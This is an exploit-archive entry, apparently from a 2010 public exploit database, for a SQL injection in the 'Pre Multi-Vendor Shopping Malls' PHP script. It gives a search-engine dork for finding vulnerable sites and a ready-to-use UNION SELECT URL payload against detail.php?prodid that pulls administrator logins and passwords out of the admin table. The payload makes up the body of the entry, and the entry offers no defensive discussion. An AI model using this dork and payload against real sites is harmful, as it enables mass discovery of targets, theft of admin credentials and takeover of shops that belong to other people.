Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability
# Published : 2010-06-22
# Author : Sangteamtham
# Previous Title : PHP Event Calendar <= v1.5 Multiple Vulnerabilities
# Next Title : Softbiz Resource Repository Script Blind SQL Injection Vulnerability

#######################################################################
#
# Source: Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability
# Download: http://preproject.com/products.asp
# Dork: inurl:Powered by: PreProjects + detail.php?prodid=694
# Author: Sangteamtham@gmail.com
#
#######################################################################

Exploit :

http://server/detail.php?prodid=999999+UNION SELECT
1,2,3,group_concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
from admin

Discovered since Wed, Jul 15, 2009